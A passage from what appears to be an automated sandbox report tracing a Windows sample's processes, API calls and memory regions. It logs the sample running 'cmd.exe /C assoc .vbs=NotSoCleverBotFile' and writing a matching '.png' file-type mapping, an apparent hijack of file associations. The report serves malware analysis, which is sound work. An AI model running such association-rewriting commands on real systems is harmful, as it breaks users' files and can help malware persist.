hKey=0xa4, lpValueName=0x0, Reserved=0x0, dwType=0x1, lpData="NotSoCleverBotFile", cbData=0x26 | out: lpData="NotSoCleverBotFile") returned 0x0 [0257.109] RegCloseKey (hKey=0xa4) returned 0x0 [0257.109] _vsnwprintf (in: _Buffer=0xd37940, _BufferCount=0x1fff, _Format="%s=%s\r\n", _ArgList=0x19f9ac | out: _Buffer=".png=NotSoCleverBotFile\r\n") returned 25 [0257.109] _get_osfhandle (_FileHandle=1) returned 0x3c [0257.109] GetFileType (hFile=0x3c) returned 0x2 [0257.109] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0257.109] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f984 | out: lpMode=0x19f984) returned 1 [0257.110] _get_osfhandle (_FileHandle=1) returned 0x3c [0257.110] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xd37940*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x19f99c, lpReserved=0x0 | out: lpBuffer=0xd37940*, lpNumberOfCharsWritten=0x19f99c*=0x19) returned 1 [0257.112] ApiSetQueryApiSetPresence () returned 0x0 [0257.112] ResolveDelayLoadedAPI () returned 0x6ab62230 [0257.168] DoSHChangeNotify () returned 0x0 [0257.368] GetProcessHeap () returned 0x5f0000 [0257.369] RtlFreeHeap (HeapHandle=0x5f0000, Flags=0x0, BaseAddress=0x5fac40) returned 1 [0257.369] GetProcessHeap () returned 0x5f0000 [0257.369] RtlFreeHeap (HeapHandle=0x5f0000, Flags=0x0, BaseAddress=0x5f76e0) returned 1 [0257.369] RegCloseKey (hKey=0xa0) returned 0x0 [0257.369] _get_osfhandle (_FileHandle=1) returned 0x3c [0257.369] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0257.370] _get_osfhandle (_FileHandle=1) returned 0x3c [0257.370] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd2f40c | out: lpMode=0xd2f40c) returned 1 [0257.370] _get_osfhandle (_FileHandle=0) returned 0x38 [0257.370] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd2f408 | out: lpMode=0xd2f408) returned 1 [0257.370] SetConsoleInputExeNameW () returned 0x1 [0257.370] GetConsoleOutputCP () returned 0x1b5 [0257.371] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0257.371] SetThreadUILanguage (LangId=0x0) returned 0x409 [0257.371] exit (_Code=0) Thread: id = 146 os_tid = 0xf34 Process: id = "16" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x3856d000" os_pid = "0xf54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0xd30" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1581 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1582 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1583 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1584 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1585 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1586 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1587 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1588 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1589 start_va = 0x7ff7625c0000 end_va = 0x7ff7625d0fff monitored = 0 entry_point = 0x7ff7625c16b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1590 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1591 start_va = 0x7d0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 1592 start_va = 0x7ffd4d670000 end_va = 0x7ffd4d857fff monitored = 0 entry_point = 0x7ffd4d69ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1593 start_va = 0x7ffd4e1c0000 end_va = 0x7ffd4e26cfff monitored = 0 entry_point = 0x7ffd4e1d81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1594 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1595 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1596 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1597 start_va = 0x7ffd4df00000 end_va = 0x7ffd4df9cfff monitored = 0 entry_point = 0x7ffd4df078a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1598 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1599 start_va = 0x8d0000 end_va = 0xacffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 1600 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1601 start_va = 0x7ffd45030000 end_va = 0x7ffd45088fff monitored = 0 entry_point = 0x7ffd4503fbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 1602 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1603 start_va = 0x7ffd4dc70000 end_va = 0x7ffd4deecfff monitored = 0 entry_point = 0x7ffd4dd44970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1604 start_va = 0x7ffd4da60000 end_va = 0x7ffd4db7bfff monitored = 0 entry_point = 0x7ffd4daa02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1605 start_va = 0x7ffd4d860000 end_va = 0x7ffd4d8c9fff monitored = 0 entry_point = 0x7ffd4d896d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1606 start_va = 0x7ffd4e9d0000 end_va = 0x7ffd4eb25fff monitored = 0 entry_point = 0x7ffd4e9da8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1607 start_va = 0x7ffd4d8d0000 end_va = 0x7ffd4da55fff monitored = 0 entry_point = 0x7ffd4d91ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1608 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1609 start_va = 0x7ffd50380000 end_va = 0x7ffd504c2fff monitored = 0 entry_point = 0x7ffd503a8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1610 start_va = 0x7ffd4e160000 end_va = 0x7ffd4e1bafff monitored = 0 entry_point = 0x7ffd4e1738b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1611 start_va = 0x7ffd4e2e0000 end_va = 0x7ffd4e31afff monitored = 0 entry_point = 0x7ffd4e2e12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1612 start_va = 0x7ffd4db80000 end_va = 0x7ffd4dc40fff monitored = 0 entry_point = 0x7ffd4dba0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1613 start_va = 0x7ffd4b010000 end_va = 0x7ffd4b195fff monitored = 0 entry_point = 0x7ffd4b05d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1614 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1615 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1616 start_va = 0x600000 end_va = 0x787fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 1617 start_va = 0x8d0000 end_va = 0xa50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 1618 start_va = 0xac0000 end_va = 0xacffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 1619 start_va = 0xad0000 end_va = 0x1ecffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 1620 start_va = 0x1ed0000 end_va = 0x1feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 1621 start_va = 0x790000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1622 start_va = 0x7ffd4eb30000 end_va = 0x7ffd5008efff monitored = 0 entry_point = 0x7ffd4ec911f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1623 start_va = 0x7ffd4cb80000 end_va = 0x7ffd4cbc2fff monitored = 0 entry_point = 0x7ffd4cb94b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1624 start_va = 0x7ffd4cce0000 end_va = 0x7ffd4d323fff monitored = 0 entry_point = 0x7ffd4cea64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1625 start_va = 0x7ffd4e480000 end_va = 0x7ffd4e526fff monitored = 0 entry_point = 0x7ffd4e4958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1626 start_va = 0x7ffd500f0000 end_va = 0x7ffd50141fff monitored = 0 entry_point = 0x7ffd500ff530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1627 start_va = 0x7ffd4cb70000 end_va = 0x7ffd4cb7efff monitored = 0 entry_point = 0x7ffd4cb73210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1628 start_va = 0x7ffd4d5b0000 end_va = 0x7ffd4d664fff monitored = 0 entry_point = 0x7ffd4d5f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1629 start_va = 0x7ffd4cb10000 end_va = 0x7ffd4cb5afff monitored = 0 entry_point = 0x7ffd4cb135f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1630 start_va = 0x7ffd4caf0000 end_va = 0x7ffd4cb03fff monitored = 0 entry_point = 0x7ffd4caf52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1631 start_va = 0x7ffd4b470000 end_va = 0x7ffd4b505fff monitored = 0 entry_point = 0x7ffd4b495570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1632 start_va = 0x1ff0000 end_va = 0x218ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 1633 start_va = 0x2190000 end_va = 0x24c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1634 start_va = 0x50000 end_va = 0x51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1635 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1636 start_va = 0x1d0000 end_va = 0x1f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 1637 start_va = 0xa60000 end_va = 0xab9fff monitored = 1 entry_point = 0xa753f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1638 start_va = 0x24d0000 end_va = 0x26eafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 1639 start_va = 0x26f0000 end_va = 0x2907fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 1640 start_va = 0x1ed0000 end_va = 0x1fddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 1641 start_va = 0x1fe0000 end_va = 0x1feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 1642 start_va = 0x2910000 end_va = 0x2b2bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 1643 start_va = 0x1ff0000 end_va = 0x2106fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 1644 start_va = 0x2180000 end_va = 0x218ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 1645 start_va = 0xa60000 end_va = 0xa9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 1646 start_va = 0x7ffd4e320000 end_va = 0x7ffd4e479fff monitored = 0 entry_point = 0x7ffd4e3638e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1647 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1648 start_va = 0x2b30000 end_va = 0x2bebfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b30000" filename = "" Region: id = 1649 start_va = 0x70000 end_va = 0x73fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1650 start_va = 0x7ffd4a370000 end_va = 0x7ffd4a391fff monitored = 0 entry_point = 0x7ffd4a371a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1651 start_va = 0x7ffd4b200000 end_va = 0x7ffd4b212fff monitored = 0 entry_point = 0x7ffd4b202760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1652 start_va = 0x7ffd4c900000 end_va = 0x7ffd4c955fff monitored = 0 entry_point = 0x7ffd4c910bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1653 start_va = 0x80000 end_va = 0x86fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 1654 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1655 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1656 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 1657 start_va = 0xaa0000 end_va = 0xaa0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 1658 start_va = 0xab0000 end_va = 0xab1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 1659 start_va = 0x7ffd43ba0000 end_va = 0x7ffd43e13fff monitored = 0 entry_point = 0x7ffd43c10400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 1660 start_va = 0x2110000 end_va = 0x2110fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1661 start_va = 0x2120000 end_va = 0x2121fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002120000" filename = "" Thread: id = 142 os_tid = 0x7ec Thread: id = 143 os_tid = 0xbcc Thread: id = 144 os_tid = 0x74c Thread: id = 145 os_tid = 0xf40 Process: id = "17" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x326fb000" os_pid = "0xe98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C assoc .vbs=NotSoCleverBotFile" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1705 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1706 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1707 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1708 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1709 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1710 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1711 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1712 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1713 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1714 start_va = 0xd00000 end_va = 0xd51fff monitored = 1 entry_point = 0xd14fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1715 start_va = 0xd60000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 1716 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1717 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1718 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1719 start_va = 0x7fff0000 end_va = 0x7dfd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1720 start_va = 0x7dfd504d0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfd504d0000" filename = "" Region: id = 1721 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1722 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 1723 start_va = 0x400000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1724 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1725 start_va = 0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1726 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1727 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1728 start_va = 0x450000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1729 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1730 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1731 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1732 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1733 start_va = 0x450000 end_va = 0x50dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1734 start_va = 0x550000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1817 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1818 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1819 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1820 start_va = 0x650000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 1821 start_va = 0x750000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 1822 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1823 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1824 start_va = 0x6ab60000 end_va = 0x6ab67fff monitored = 0 entry_point = 0x6ab61840 region_type = mapped_file name = "cmdext.dll" filename = "\\Windows\\SysWOW64\\cmdext.dll" (normalized: "c:\\windows\\syswow64\\cmdext.dll") Region: id = 1825 start_va = 0x75690000 end_va = 0x76a8efff monitored = 0 entry_point = 0x7584b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1826 start_va = 0x76a90000 end_va = 0x76ac6fff monitored = 0 entry_point = 0x76a93b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1827 start_va = 0x76e20000 end_va = 0x77318fff monitored = 0 entry_point = 0x77027610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 1828 start_va = 0x752b0000 end_va = 0x7546cfff monitored = 0 entry_point = 0x75392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id 